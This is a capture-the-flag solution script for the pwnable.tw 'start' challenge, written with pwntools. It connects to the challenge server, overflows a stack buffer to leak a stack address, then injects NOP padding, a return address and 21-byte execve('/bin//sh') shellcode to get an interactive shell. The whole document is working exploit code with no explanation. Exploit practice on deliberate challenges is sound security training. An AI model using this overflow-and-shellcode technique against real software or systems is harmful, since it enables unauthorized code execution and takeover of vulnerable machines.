Shell sịn ( start – pwnable.tw )

from pwn import *

#s = process("./start")
s = remote('chall.pwnable.tw',10000)

a_leak = p32(0x08048087) #0x08048087 <+39>:	mov    ecx,esp
#shell23byte = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
shell23byte = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"

buf = 0

def leak(buf):

	chuoi = s.recvuntil(":")
	print chuoi
	a = raw_input("Press any key")
	payload1 = "a"*20+a_leak
	s.send(payload1)
	print "sent: ",payload1
	chuoi = s.recv(200)
	addr =  chuoi.replace("Let's start the CTF:","")[0:4]
	addr = u32(addr) + 20 + buf
	print "address shell: ",hex(addr)
	return addr

def pwn(addr):
	payload2 = '\x90'*20 + p32(addr) + "\x90"*12 +shell23byte
	a = raw_input("Press any key")
	s.sendline(payload2)
	print "sent: ",payload2

addr = leak(buf)
pause(2)
pwn(addr)
pause(2)
s.interactive()